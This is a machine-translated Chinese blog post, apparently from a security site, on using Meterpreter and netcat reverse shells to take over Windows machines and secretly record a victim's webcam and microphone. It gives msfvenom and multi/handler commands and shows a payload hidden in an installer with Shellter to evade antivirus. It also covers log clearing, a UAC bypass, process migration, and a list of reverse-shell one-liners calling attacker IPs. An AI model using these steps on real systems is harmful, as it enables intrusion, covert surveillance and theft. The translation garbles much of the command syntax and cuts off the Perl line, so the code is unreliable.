关注我们

反向壳和控制网络摄像头

LzersLzers 安全文摘 2019-07-05 590512 0

反向壳和控制网络摄像头

如果您的网络摄像头上有一块胶带,您很可能听说黑客或NSA可以远程侦察您。问题是如何?远方的人,你从未见过的人如何能够远程连接你的机器并监视你? 

现在可能是你的CCTV,IP摄像头只是暴露在互联网上,攻击者在Shodan等网站上发现了它。你没有更改默认密码和bam,他们在。看着你的一举一动。

物联网相机通常就是这种情况。但是,如果我们谈论您内置的网络摄像头,答案更可能是通过Meterpreter有效负载。Meterpreter可以让你访问反向shell,这是我们将在下面介绍的内容。有关Meterpreter的更多信息,请阅读:  

https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/

你可能在想,为什么反向壳?他们为什么不直接访问我的机器?好吧,因为这种方法很可能会被阻止。我们倾向于限制入站流量比出站流量更多。如果有人想要连接到您的机器,您的机器很可能会阻止它(除非被抬起)。另一方面,如果您尝试连接它们,则您的计算机更有可能让此流量通过。这是因为您的机器是想要建立连接的机器。


反向壳和控制网络摄像头


msfvenom是一个框架,我们将用它来获得反向shell。它已经预装在Parrot和Kali上。让我们运行以下命令来创建Meterpreter反向TCP shell有效负载。

msfvenom -p windows / meterpreter / reverse_tcp -a x86 -platform windows -f exe LHOST = 192.168.XX LPORT = 4444 -o /home/parrot/name.exe


反向壳和控制网络摄像头


任务完成。现在让我们上传那个和.......... blocked。这是因为MeterPreter是众所周知的有效载荷,因此大多数的防病毒软件都能够阻止/隔离它。除非你正在处理一个现在仍然存在的不安全的客户。


反向壳和控制网络摄像头


我们可以使用一个名为Shellter的工具来尝试更改哈希并将反向shell嵌入到另一个文件中。通常,一个人选择将shell嵌入到安装文件中。原因是,大多数安装文件需要以管理员身份运行。正如您稍后将看到的那样,以管理员身份运行漏洞利用程序可以完成所有艰苦工作。

你可以通过简单地运行它的避难所来开始庇护。同样,这是预装Parrot和Kali。


反向壳和控制网络摄像头


我们现在使用Auto [A]并定位我为此示例创建的可执行文件。


反向壳和控制网络摄像头


接下来,我们选择反向TCP shell并输入我们机器的IP和端口(攻击者)。完成后,它会将shell嵌入到您选择的exe中,以便您可以将其上传到目标计算机。现在你必须使用一种复杂的方法将它放到目标机器上,但是对于这个例子,我将复制并粘贴。

然而,尽管屏蔽了Meterpreter外壳,AV仍设法检测到它。我现在就打算把它关掉,因为我可以。在现实世界中,攻击者会将AV瘫痪或使其盲目,以便他们可以降低有效载荷。

现在利用是在目标机器上,让我们运行它。
在我们开始之前,让我们在攻击计算机上加载msfconsole(Metasploit)并运行以下命令:

msfconsole 
使用multi / handler 
set payload windows / meterpreter / reverse_tcp 
set LHOST 192.168.XX 
set LPORT 4444 
run


反向壳和控制网络摄像头


您的会话现在将侦听反向shell脚本中指定的端口和IP。现在让我们让用户运行漏洞利用:


反向壳和控制网络摄像头


正如您在右侧所看到的,我们有几个失败。这就是我之前提到的需要用户以管理员身份运行它的内容。这样就可以运行和注入所有脚本和DLL。如果用户以管理员身份运行它,您将看到没有失败。像这样:


反向壳和控制网络摄像头


这是你可以开始玩的时候。攻击者可以在您的计算机上执行多项操作,但如果他们想要使用网络摄像头,他们会执行以下操作:

显示网络摄像头: webcam_list 
网络摄像头快照帮助: webcam_snap -h 
拍摄照片后不要加载图像:webcam_snap -i 1 -v false 
录制音频: record_mic 
录制网络摄像头:运行网络摄像头-p / var / www / 
停止录制:运行网络摄像头-s

说“茄子!!!


反向壳和控制网络摄像头
取自机器人先生


这不仅仅是网络摄像头。您可以运行更多命令。例如:清除所有日志(应用程序,系统和安全日志):clearev

这是一个例子,因为黑客不太可能运行它。这是因为做这样的事情会提醒某人。如果你发现一台机器已经完成了日志的擦除,你可以打赌有人已经上过它了。相反,攻击者很可能会删除选择的事件以覆盖他们的踪迹。现在,它将敏锐地发现像时间差距这样的东西。

所有这些都需要管理员权限,而您的用户可能无法使用升级的权限运行它。那很好,因为你可以使用像bypassuac_comhijacker这样的东西。你仍然需要得到一个反向shell,首先它可以在用户级别。

获得shell后,输入后台并按Enter键。这会将当前会话移至后台。然后你可以像这样交换到exploitpassacac_comhijack:


反向壳和控制网络摄像头


 然后,您可以回到原始会话并运行以下命令:


反向壳和控制网络摄像头


如果完成,它应该给你一个管理员shell。完成此操作后,您将需要迁移到更稳定的流程。并不是说你会想象你已经将你的反向shell隐藏在Putty exe或安装程序文件中。一旦他们关闭应用程序,您的连接就会丢失,而您可能无法获得另一个连接。这就是您希望快速迁移到持续运行的东西的原因。


反向壳和控制网络摄像头


首先,让我们查看正在运行的进程。要做到这一点,运行ps


反向壳和控制网络摄像头


找到稳定的进程后,运行migrate [PID]


反向壳和控制网络摄像头


然后,这会将您的Meterpreter会话迁移到另一个进程。如果他们关闭被利用的应用程序,您的会话将保留。

正如您所见,Meterpreter非常强大!问题是我不得不手动禁用安全控件。如果客户端是半安全的,它们很可能会阻止您的有效负载。这就是为什么在利用漏洞时经常提供反向shell有效负载的原因。利用可以允许他们上载和运行有效载荷,以便他们可以建立Meterpreter会话。

Meterpreter并不是获得反向shell的唯一方法。可以使用一个名为Netcat的漂亮工具。正如您在下面所看到的,您可能会有更多的运气,因为某些AV供应商并不认为这是一种威胁。


反向壳和控制网络摄像头


https://www.virustotal.com/gui/file/be4211fe5c1a19ff393a2bcfa21dad8d0a687663263a63789552bda446d9421b/detection

可以在usr / share / windows-binaries / nc.exe下的Parrot或Kali上找到Netcat 。将nc.exe上传到目标计算机后,我们可以运行nc.exe [Attacker IP] [Port] -e cmd.exe。这是您最有可能通过脚本自动执行的操作。


反向壳和控制网络摄像头


在攻击者机器上我们需要监听连接这可以通过运行来完成: nc -lvp [选择端口]

这将为您提供一个非常简单的反向shell。它只具有用户级权限,但它是一个起点。然后,您可以使用它来进一步利用系统获得管理员权限。您并不总是必须拥有管理员权限才能完成大量工作。如果攻击者设法获得shell,他们可能只是开始窃取或删除文件。简单但有效。下面是一些运行反向shell的例子:

PHP
php -r'$ sock = fsockopen(“192.168.0.10”,1234); exec(“/ bin / sh -i <&3>&3 2>&3”);'

Bash
bash -i>&/ dev / tcp / 192.168.0.1 / 8080 0>&1

Netcat Linux
nc 192.168.0.10 1234 -e / bin / sh

Python
python -c'import socket,subprocess,os; s = socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((“192.168.0.10”,1234)); os.dup2(s.fileno( ),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); P = subprocess.call([“/ bin / sh的”,” -我”]);”

Perl
perl -e'使用Socket; $ i =“192.168.0.10”; $ p = 1234; socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”)); if(connect,S(sockaddr_in($ p,inet_aton) ($ I)))){开放(STDIN,”>&S”);开放(STDOUT,

文章翻译自https://ctrlaltdel.blog/2019/07/02/reverse-shells-and-controlling-webcams/

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢1发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址